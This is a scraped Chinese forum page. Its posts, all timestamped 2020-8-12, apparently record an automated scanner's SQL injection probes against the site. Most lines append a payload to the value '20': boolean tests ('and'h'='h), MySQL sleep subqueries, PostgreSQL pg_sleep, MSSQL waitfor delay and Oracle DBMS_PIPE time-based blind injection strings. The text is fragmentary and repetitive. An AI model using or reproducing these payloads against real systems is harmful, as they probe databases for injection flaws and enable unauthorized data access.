发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20閹发表于 2020-8-12 14:04
20'and'h'='h发表于 2020-8-12 14:04
20'and'h'='h发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20'and'w'='o发表于 2020-8-12 14:04
20"and"d"="d发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20"and(select*from(select+sleep(0))a/**/union/**/select+1)="发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20'/**/and(select'1'from/**/pg_sleep(0))>'0发表于 2020-8-12 14:04
20'/**/and(select'1'from/**/pg_sleep(2))>'0发表于 2020-8-12 14:04
20/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/发表于 2020-8-12 14:04
20/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('l',0)发表于 2020-8-12 14:04
20/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('c',2)发表于 2020-8-12 14:04
20发表于 2020-8-12 14:04
20